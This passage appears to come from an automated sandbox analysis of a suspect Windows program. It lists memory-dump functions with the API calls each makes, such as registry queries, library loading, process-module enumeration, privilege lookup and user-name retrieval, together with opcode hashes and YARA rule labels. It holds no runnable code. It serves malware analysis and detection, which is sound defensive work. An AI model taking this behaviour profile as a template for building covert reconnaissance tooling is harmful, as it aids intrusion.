                                                                                                            0x0040af85
                                                                                                            0x0040af8a
                                                                                                            0x0040af90
                                                                                                            0x0040ae82
                                                                                                            0x0040b675
                                                                                                            0x0040b677
                                                                                                            0x0040b67c
                                                                                                            0x0040b681
                                                                                                            0x0040b684
                                                                                                            0x0040b686
                                                                                                            0x0040b688
                                                                                                            0x0040b68f
                                                                                                            0x0040b6d4
                                                                                                            0x00000000
                                                                                                            0x0040b691
                                                                                                            0x0040b693
                                                                                                            0x0040b699
                                                                                                            0x0040b69e
                                                                                                            0x0040b6a4
                                                                                                            0x0040b6a7
                                                                                                            0x0040b6a9
                                                                                                            0x0040b6ab
                                                                                                            0x0040b6ac
                                                                                                            0x0040b6ad
                                                                                                            0x0040b6b3
                                                                                                            0x0040b6b4
                                                                                                            0x0040b6bb
                                                                                                            0x0040b6c0
                                                                                                            0x0040b6c4
                                                                                                            0x0040b6c6
                                                                                                            0x0040b6d5
                                                                                                            0x0040b6e3
                                                                                                            0x0040b6e5
                                                                                                            0x0040b6e7
                                                                                                            0x0040b6fa
                                                                                                            0x0040b6fc
                                                                                                            0x0040b6e5
                                                                                                            0x0040b6c4
                                                                                                            0x0040b68f
                                                                                                            0x0040b702
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x0040af3b
                                                                                                            0x0040af4b
                                                                                                            0x00000000

                                                                                                            APIs
                                                                                                            • _malloc.LIBCMT ref: 0040AF40
                                                                                                              • Part of subcall function 0040B80D: __FF_MSGBANNER.LIBCMT ref: 0040B830
                                                                                                              • Part of subcall function 0040B80D: __NMSG_WRITE.LIBCMT ref: 0040B837
                                                                                                              • Part of subcall function 0040B80D: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,00411C46,00000001,00000001,00000001,?,0040D62A,00000018,00421240,0000000C,0040D6BB), ref: 0040B884
                                                                                                            • std::bad_alloc::bad_alloc.LIBCMT ref: 0040AF63
                                                                                                              • Part of subcall function 0040AEBC: std::exception::exception.LIBCMT ref: 0040AEC8
                                                                                                            • std::bad_exception::bad_exception.LIBCMT ref: 0040AF77
                                                                                                            • __CxxThrowException@8.LIBCMT ref: 0040AF85
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.917594735.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 0000000B.00000002.917652746.0000000000448000.00000040.00000001.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: AllocateException@8HeapThrow_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exceptionstd::exception::exception
                                                                                                            • String ID:
                                                                                                            • API String ID: 1411284514-0
                                                                                                            • Opcode ID: 6bc6e0b56d612ca3ed70617188c9b359ffa9195b12e98a96826140dc72c7e738
                                                                                                            • Instruction ID: d0037a69dd8aa8fc1f7bd44e20a83df3c9345600b6565f77841dd3ec14470a5b
                                                                                                            • Opcode Fuzzy Hash: 6bc6e0b56d612ca3ed70617188c9b359ffa9195b12e98a96826140dc72c7e738
                                                                                                            • Instruction Fuzzy Hash: CCF0E271A0430662CB14BB61EC0BD4A3B688F4031CB6000BFEC11750E2DF7CDA16959E
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 04B28890, Relevance: 3.9, Strings: 3, Instructions: 171COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.921313003.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: :@fq$:@fq$KDBM
                                                                                                            • API String ID: 0-3571309926
                                                                                                            • Opcode ID: a6dad6c52b8a341ee8eee9005cb74e71f47bf5794187c63e1f62156ac88ec463
                                                                                                            • Instruction ID: 7756284801ec8c29adc582a23e1eec17ea55f2fcecd5efac3eba83ce24542b68
                                                                                                            • Opcode Fuzzy Hash: a6dad6c52b8a341ee8eee9005cb74e71f47bf5794187c63e1f62156ac88ec463
                                                                                                            • Instruction Fuzzy Hash: 00710C3098430A8FDB80FBB8E44C78D7B66FF85705F108A19D2059B69CDF79A516CB61
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 04B20410, Relevance: 3.9, Strings: 3, Instructions: 125COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.921313003.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: :@fq$>_kq$f]kq
                                                                                                            • API String ID: 0-1744552541
                                                                                                            • Opcode ID: 6c3122693ee8b8f7b89174a624e3cc2b090652940020364b95d8fd8e4c940f29
                                                                                                            • Instruction ID: 6514aaae1fc4063def7ff21137f4aab65d5037042056ab723110d79b3871fb30
                                                                                                            • Opcode Fuzzy Hash: 6c3122693ee8b8f7b89174a624e3cc2b090652940020364b95d8fd8e4c940f29
                                                                                                            • Instruction Fuzzy Hash: 33519970E457058BD748EF2AE454299BBE7BFC8708F10C52AC2188B29DEF3A58058F51
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 04B20420, Relevance: 3.9, Strings: 3, Instructions: 120COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.921313003.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: :@fq$>_kq$f]kq
                                                                                                            • API String ID: 0-1744552541
                                                                                                            • Opcode ID: 8628ebadb220dcd57975ede1aaa5963da4006dc0d94beeda27a72b7a8eaeb850
                                                                                                            • Instruction ID: 33ae6822800fba56d7c0c87bdbe111f09d32c02e4810f466226ed95855e3567b
                                                                                                            • Opcode Fuzzy Hash: 8628ebadb220dcd57975ede1aaa5963da4006dc0d94beeda27a72b7a8eaeb850
                                                                                                            • Instruction Fuzzy Hash: 37517970E447058BD748FF6AE454699BBE6BFC8708F10C52AC2188B29CEF7A58058F51
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 020DB60E, Relevance: 1.6, APIs: 1, Instructions: 100registryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • RegOpenKeyExW.KERNELBASE(?,00000E38), ref: 020DB6CD
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.919054937.00000000020DA000.00000040.00000001.sdmp, Offset: 020DA000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: Open
                                                                                                            • String ID:
                                                                                                            • API String ID: 71445658-0
                                                                                                            • Opcode ID: e7688cd7611ef089b18b3093cffb513cf06f956c6a18a91387bd17dec211cea3
                                                                                                            • Instruction ID: 360b24ca44465d63c6d9ab10ff0198e339117e976e734d9a79010528368578e7
                                                                                                            • Opcode Fuzzy Hash: e7688cd7611ef089b18b3093cffb513cf06f956c6a18a91387bd17dec211cea3
                                                                                                            • Instruction Fuzzy Hash: CD3182B25093846FE7238B258C45FA6BFB8EF06624F09849BE9809B153D664A509C771
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 020DB715, Relevance: 1.6, APIs: 1, Instructions: 89registryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • RegQueryValueExW.KERNELBASE(?,00000E38,B0EAB1F4,00000000,00000000,00000000,00000000), ref: 020DB7D0
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.919054937.00000000020DA000.00000040.00000001.sdmp, Offset: 020DA000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: QueryValue
                                                                                                            • String ID:
                                                                                                            • API String ID: 3660427363-0
                                                                                                            • Opcode ID: e22258ffbc9c4f4c2d6425ba0f300536f6279642a6d7d4257d5a95a335e24a12
                                                                                                            • Instruction ID: 2ec2373762cabc01ecb28adaa1ea22084762599abaf0e226be0ce34b0e7bafd3
                                                                                                            • Opcode Fuzzy Hash: e22258ffbc9c4f4c2d6425ba0f300536f6279642a6d7d4257d5a95a335e24a12
                                                                                                            • Instruction Fuzzy Hash: 3D31B1711093806FE722CF25CC84FA2BFF8EF06324F18849AE9858B153D360E548CB61
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 020DAC10, Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • K32EnumProcessModules.KERNEL32(?,00000E38,B0EAB1F4,00000000,00000000,00000000,00000000), ref: 020DACAA
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.919054937.00000000020DA000.00000040.00000001.sdmp, Offset: 020DA000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: EnumModulesProcess
                                                                                                            • String ID:
                                                                                                            • API String ID: 1082081703-0
                                                                                                            • Opcode ID: bf974cda2465dac9ef050cd7ff3ee2392d406a143d377d4a0072812d2f000993
                                                                                                            • Instruction ID: 404b17d9423933d5aa9ded00ae65e16500dd1b5568b9bf3dc615692c9de93cdf
                                                                                                            • Opcode Fuzzy Hash: bf974cda2465dac9ef050cd7ff3ee2392d406a143d377d4a0072812d2f000993
                                                                                                            • Instruction Fuzzy Hash: A221E4B21093806FE7128F24DD45B96BFB8EF06320F0884ABE984DF193D224D945C761
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 020DAD09, Relevance: 1.6, APIs: 1, Instructions: 82COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • K32GetModuleInformation.KERNEL32(?,00000E38,B0EAB1F4,00000000,00000000,00000000,00000000), ref: 020DAD9A
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.919054937.00000000020DA000.00000040.00000001.sdmp, Offset: 020DA000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: InformationModule
                                                                                                            • String ID:
                                                                                                            • API String ID: 3425974696-0
                                                                                                            • Opcode ID: 3e9b468a86a285da2fede0e0a6f357ce240ea60c174dcd2c6f45724588c955f7
                                                                                                            • Instruction ID: 06f764cc5bb66cfa170a604fdf4a927dad8351d1f151180efaf477c2610a7ee6
                                                                                                            • Opcode Fuzzy Hash: 3e9b468a86a285da2fede0e0a6f357ce240ea60c174dcd2c6f45724588c955f7
                                                                                                            • Instruction Fuzzy Hash: D92186B15093846FE722CF25DC44F56BFA8EF46220F0884AAE945DB152D764E948CB71
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 020DAE00, Relevance: 1.6, APIs: 1, Instructions: 81COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • K32GetModuleFileNameExW.KERNEL32(?,00000E38,?,?), ref: 020DAEA6
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.919054937.00000000020DA000.00000040.00000001.sdmp, Offset: 020DA000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: FileModuleName
                                                                                                            • String ID:
                                                                                                            • API String ID: 514040917-0
                                                                                                            • Opcode ID: d02ff3302c2352276f16d6b23709ba095783cda3847eded46976b9ac3d5697a0
                                                                                                            • Instruction ID: bef7ed1ad5fa3974316b85d3bdd56f2fdc508991786062486c5ea1ed3a166106
                                                                                                            • Opcode Fuzzy Hash: d02ff3302c2352276f16d6b23709ba095783cda3847eded46976b9ac3d5697a0
                                                                                                            • Instruction Fuzzy Hash: 7821AD7150A3C06FD3128B65CC55B66BFB4EF87610F0984DBE8848F1A3D624A909C7A2
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 020DBBC4, Relevance: 1.6, APIs: 1, Instructions: 76registryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • RegQueryValueExW.KERNELBASE(?,00000E38,?,?), ref: 020DBC5E
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.919054937.00000000020DA000.00000040.00000001.sdmp, Offset: 020DA000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: QueryValue
                                                                                                            • String ID:
                                                                                                            • API String ID: 3660427363-0
                                                                                                            • Opcode ID: 9b90faf00aae3bc1bd36624f01b8002509c02231954aba0171e8af54eeca8182
                                                                                                            • Instruction ID: 3be17d63947b6f4f1f87e32c112c7bc70900fb34d1d0dff85dde22e4bffc472b
                                                                                                            • Opcode Fuzzy Hash: 9b90faf00aae3bc1bd36624f01b8002509c02231954aba0171e8af54eeca8182
                                                                                                            • Instruction Fuzzy Hash: 2421C8755093C06FD3138B259C51B62BFB4EF87A20F0981DBE9848B653D225A919C7B2
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 020DB64E, Relevance: 1.6, APIs: 1, Instructions: 74registryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • RegOpenKeyExW.KERNELBASE(?,00000E38), ref: 020DB6CD
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.919054937.00000000020DA000.00000040.00000001.sdmp, Offset: 020DA000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: Open
                                                                                                            • String ID:
                                                                                                            • API String ID: 71445658-0
                                                                                                            • Opcode ID: 36f08d64eecad933c651e75e97ecf55f267dddab4172cb8fc950d81065aeca8e
                                                                                                            • Instruction ID: 2ae3162443aef3278d993ecd4f484b7bd1681b2ab0d010032012a52df83c7ac8
                                                                                                            • Opcode Fuzzy Hash: 36f08d64eecad933c651e75e97ecf55f267dddab4172cb8fc950d81065aeca8e
                                                                                                            • Instruction Fuzzy Hash: 9421AEB2501704AFE7219F69CC85FAAFBECEF08724F04845AED419B641D624E508CAB1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 020DB756, Relevance: 1.6, APIs: 1, Instructions: 69registryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • RegQueryValueExW.KERNELBASE(?,00000E38,B0EAB1F4,00000000,00000000,00000000,00000000), ref: 020DB7D0
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.919054937.00000000020DA000.00000040.00000001.sdmp, Offset: 020DA000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: QueryValue
                                                                                                            • String ID:
                                                                                                            • API String ID: 3660427363-0
                                                                                                            • Opcode ID: 938339e387fa12a7e3a9705cc1e6f070fa02f5a954e9bb62b6a1afe6b6667d28
                                                                                                            • Instruction ID: fc08e5368911ba886a50c7c4290aa9e5b4f7acaf6941f4966e04d098a9dacbd8
                                                                                                            • Opcode Fuzzy Hash: 938339e387fa12a7e3a9705cc1e6f070fa02f5a954e9bb62b6a1afe6b6667d28
                                                                                                            • Instruction Fuzzy Hash: B021AFB1601704AFEB61CF26CC84FA6FBECEF04724F08846AE945CB656D764E408CA71
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 020DAA70, Relevance: 1.6, APIs: 1, Instructions: 68COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • FindCloseChangeNotification.KERNELBASE(?), ref: 020DAADC
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.919054937.00000000020DA000.00000040.00000001.sdmp, Offset: 020DA000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: ChangeCloseFindNotification
                                                                                                            • String ID:
                                                                                                            • API String ID: 2591292051-0
                                                                                                            • Opcode ID: 03d48e5e2eb9c3f3067bfb0acac82d1799fea55fa3c79a5a5f7c05b41816d248
                                                                                                            • Instruction ID: 2b70909ffe6a4b8e0f172796cac0f44ec249b4286a74f4792245c0b36a84e869
                                                                                                            • Opcode Fuzzy Hash: 03d48e5e2eb9c3f3067bfb0acac82d1799fea55fa3c79a5a5f7c05b41816d248
                                                                                                            • Instruction Fuzzy Hash: 6621A17250A3C05FDB138B25DD54792BFB4EF07224F0D84DAEC858F663D2649908CB62
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 020DB83F, Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • MkParseDisplayName.OLE32(?,00000E38,?,?), ref: 020DB8C2
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.919054937.00000000020DA000.00000040.00000001.sdmp, Offset: 020DA000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: DisplayNameParse
                                                                                                            • String ID:
                                                                                                            • API String ID: 3580041360-0
                                                                                                            • Opcode ID: 945243ca6446a56b22292d08e82f51f3dc42d1706050ffa7d9bcf676cb2761c7
                                                                                                            • Instruction ID: 4d6ea87b8140e2e28a983f75b477a1c2d35803003f1321d633fdfcf72fd08aa0
                                                                                                            • Opcode Fuzzy Hash: 945243ca6446a56b22292d08e82f51f3dc42d1706050ffa7d9bcf676cb2761c7
                                                                                                            • Instruction Fuzzy Hash: 5011DA715453846FD311CB26DC41F72BFB8EF87620F09818AED844B652D221B915CBA1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 020DAD36, Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • K32GetModuleInformation.KERNEL32(?,00000E38,B0EAB1F4,00000000,00000000,00000000,00000000), ref: 020DAD9A
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.919054937.00000000020DA000.00000040.00000001.sdmp, Offset: 020DA000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: InformationModule
                                                                                                            • String ID:
                                                                                                            • API String ID: 3425974696-0
                                                                                                            • Opcode ID: 69fb6b6766c46ceb8cb4c23539d501d7f698b850d4d052125e94b54705d2bc1c
                                                                                                            • Instruction ID: 68dbd6f08be16e74045887c8dadba83151a8bda0d4f795903b04286d31acd3f8
                                                                                                            • Opcode Fuzzy Hash: 69fb6b6766c46ceb8cb4c23539d501d7f698b850d4d052125e94b54705d2bc1c
                                                                                                            • Instruction Fuzzy Hash: D711B1B1601304AFEB21CF25DC84FAABBE8EF04321F04846AED45CB246DB74E404CA71
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 020DAEDB, Relevance: 1.6, APIs: 1, Instructions: 67libraryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • LoadLibraryA.KERNELBASE(?,00000E38), ref: 020DAF67
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.919054937.00000000020DA000.00000040.00000001.sdmp, Offset: 020DA000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: LibraryLoad
                                                                                                            • String ID:
                                                                                                            • API String ID: 1029625771-0
                                                                                                            • Opcode ID: 2e27a25c780f48682aec74c8464e88c34fb20c9952be1f9acc01cd828a34508a
                                                                                                            • Instruction ID: a91fbebb7ddce75d4ae7ed598c472398572a8c416017a19a989130340438342e
                                                                                                            • Opcode Fuzzy Hash: 2e27a25c780f48682aec74c8464e88c34fb20c9952be1f9acc01cd828a34508a
                                                                                                            • Instruction Fuzzy Hash: F42106711093806FE722CB15CC85FA6BFA8EF45320F1884DAFD445F192D374A948CB62
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 020DA797, Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 020DA806
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.919054937.00000000020DA000.00000040.00000001.sdmp, Offset: 020DA000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: LookupPrivilegeValue
                                                                                                            • String ID:
                                                                                                            • API String ID: 3899507212-0
                                                                                                            • Opcode ID: ebef667c261498e6fa1ef34392f5b94cdfde1897bbae30db2484a695e64c9bc6
                                                                                                            • Instruction ID: 4675bb501e4f486bb46142d15a1c5c7d4874059da3f605d967ae3faf1bb400d6
                                                                                                            • Opcode Fuzzy Hash: ebef667c261498e6fa1ef34392f5b94cdfde1897bbae30db2484a695e64c9bc6
                                                                                                            • Instruction Fuzzy Hash: F62184B16093815FD762CF25DC54B52BFF8EF46214F0884AAED45CB652D374E804D761
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 020DAC4E, Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • K32EnumProcessModules.KERNEL32(?,00000E38,B0EAB1F4,00000000,00000000,00000000,00000000), ref: 020DACAA
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.919054937.00000000020DA000.00000040.00000001.sdmp, Offset: 020DA000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: EnumModulesProcess
                                                                                                            • String ID:
                                                                                                            • API String ID: 1082081703-0
                                                                                                            • Opcode ID: 1b9e7dfa81fcfb41f61dfd48079273529e92427a9fd9273c17f258991d500703
                                                                                                            • Instruction ID: 31ffa40afd6a2c77578e488c9617b7c33efb5eb3ad64bbf3ad72d57bcb0d156e
                                                                                                            • Opcode Fuzzy Hash: 1b9e7dfa81fcfb41f61dfd48079273529e92427a9fd9273c17f258991d500703
                                                                                                            • Instruction Fuzzy Hash: E711C4B1601304AFEB61CF69DD45B6AFBA8EF44320F04886AED45CB645D774E404CB72
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 020DB55A, Relevance: 1.6, APIs: 1, Instructions: 61COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 020DB5CE
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.919054937.00000000020DA000.00000040.00000001.sdmp, Offset: 020DA000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: DuplicateHandle
                                                                                                            • String ID:
                                                                                                            • API String ID: 3793708945-0
                                                                                                            • Opcode ID: 89a68366c54db0ce16ebeef4c03387a882d5e1689dc9e0806bfdb07540eeb931
                                                                                                            • Instruction ID: 61cf0e4df0ad96f1a30553e7ff3fab40c5c12e887e20ccc4f0f2db4e4c6a2811
                                                                                                            • Opcode Fuzzy Hash: 89a68366c54db0ce16ebeef4c03387a882d5e1689dc9e0806bfdb07540eeb931
                                                                                                            • Instruction Fuzzy Hash: CF216D72409380AFDB228F65DC44B52BFF4EF06220F0988DEED858F562C275A458DB62
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 020DA651, Relevance: 1.6, APIs: 1, Instructions: 61COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • FindCloseChangeNotification.KERNELBASE(?), ref: 020DA6B4
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.919054937.00000000020DA000.00000040.00000001.sdmp, Offset: 020DA000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: ChangeCloseFindNotification
                                                                                                            • String ID:
                                                                                                            • API String ID: 2591292051-0
                                                                                                            • Opcode ID: 227980cad14ebb0cc100c0e97688e149ea9193ff20fa02536db490df9af2ef08
                                                                                                            • Instruction ID: 8cd19ae57bfb76f14e877249e98e36e0022eaa61ea528a468fc3a5ccb24387d3
                                                                                                            • Opcode Fuzzy Hash: 227980cad14ebb0cc100c0e97688e149ea9193ff20fa02536db490df9af2ef08
                                                                                                            • Instruction Fuzzy Hash: D2117F7550A3809FD7528F25DC45752BFB4EF06220F0984EBED85CF263C278A948CB61
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 020DBD62, Relevance: 1.6, APIs: 1, Instructions: 61COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GetUserNameW.ADVAPI32(?,00000E38,?,?), ref: 020DBDDA
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.919054937.00000000020DA000.00000040.00000001.sdmp, Offset: 020DA000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: NameUser
                                                                                                            • String ID:
                                                                                                            • API String ID: 2645101109-0
                                                                                                            • Opcode ID: bf7e0cd16d8f2f1c37188154efeb07cb8520926402678ad70cd2c195595f472b
                                                                                                            • Instruction ID: 39c76fac104403deb2e6762ebff6113a8f72143f22afefe5ac0b3e602cbbcdf2
                                                                                                            • Opcode Fuzzy Hash: bf7e0cd16d8f2f1c37188154efeb07cb8520926402678ad70cd2c195595f472b
                                                                                                            • Instruction Fuzzy Hash: 6B11A7715053447FD321CB16DC45F72BFB8EF86620F08819AED448B652D221B915CBB2
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 020DAEFE, Relevance: 1.6, APIs: 1, Instructions: 56libraryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • LoadLibraryA.KERNELBASE(?,00000E38), ref: 020DAF67
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.919054937.00000000020DA000.00000040.00000001.sdmp, Offset: 020DA000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: LibraryLoad
                                                                                                            • String ID:
                                                                                                            • API String ID: 1029625771-0
                                                                                                            • Opcode ID: 6245715e2948cc7becb482663bf4b10db10829eb1f5a2d292a6c101667e823b2
                                                                                                            • Instruction ID: 9f891548fa26db576ecc2505e13aa07dd346f3fbd541055fff3911af92f274ec
                                                                                                            • Opcode Fuzzy Hash: 6245715e2948cc7becb482663bf4b10db10829eb1f5a2d292a6c101667e823b2
                                                                                                            • Instruction Fuzzy Hash: 5211E572601300AFE721CB15DD45B6AFB98DF04720F14C49AFD445B286D6B8A544CAB1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 020DA7BE, Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 020DA806
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.919054937.00000000020DA000.00000040.00000001.sdmp, Offset: 020DA000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: LookupPrivilegeValue
                                                                                                            • String ID:
                                                                                                            • API String ID: 3899507212-0
                                                                                                            • Opcode ID: 67bd8375706e003ce2b17f41f93ce4abfe9cb1b9037c1053a3d24ea00b4692f4
                                                                                                            • Instruction ID: f5244736c4b323782e14f8cca37ec1053ff8d0810a571383245b56915d593ad7
                                                                                                            • Opcode Fuzzy Hash: 67bd8375706e003ce2b17f41f93ce4abfe9cb1b9037c1053a3d24ea00b4692f4
                                                                                                            • Instruction Fuzzy Hash: E411A5717013418FD760CF2ADC84756FBE8EF04221F08846AEC45CB645E774D404CAB1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 020DA5C3, Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • SetErrorMode.KERNELBASE(?), ref: 020DA620
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.919054937.00000000020DA000.00000040.00000001.sdmp, Offset: 020DA000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: ErrorMode
                                                                                                            • String ID:
                                                                                                            • API String ID: 2340568224-0
                                                                                                            • Opcode ID: 26be487090c214192760be0a2361beedcb0548a84e8cbcb4e3b39f2e076dd38a
                                                                                                            • Instruction ID: 71d2b417530c5ee66548c59f14d3c4b0833382fc33f85ab83d4df7539507a9d2
                                                                                                            • Opcode Fuzzy Hash: 26be487090c214192760be0a2361beedcb0548a84e8cbcb4e3b39f2e076dd38a
                                                                                                            • Instruction Fuzzy Hash: CA11A37140A384AFD7128B15DC44B62BFA4EF46220F0884DAED848F262C379A948CB72
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 020DAE56, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • K32GetModuleFileNameExW.KERNEL32(?,00000E38,?,?), ref: 020DAEA6
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.919054937.00000000020DA000.00000040.00000001.sdmp, Offset: 020DA000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: FileModuleName
                                                                                                            • String ID:
                                                                                                            • API String ID: 514040917-0
                                                                                                            • Opcode ID: c39912080a1aefdf8c4d522dcf778d8f5e409c5cf24b7c3d58935c38caf20e6f
                                                                                                            • Instruction ID: fc6f0405f2d53249a6e43c7bd420af516e9551fd3e4c7f4f19d9a8858cadc0d0
                                                                                                            • Opcode Fuzzy Hash: c39912080a1aefdf8c4d522dcf778d8f5e409c5cf24b7c3d58935c38caf20e6f
                                                                                                            • Instruction Fuzzy Hash: F901B171500700ABD310DF1ADC85B36FBA8EB89B20F14812AED088B641D631B915CAA1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 020DB58A, Relevance: 1.5, APIs: 1, Instructions: 45COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 020DB5CE
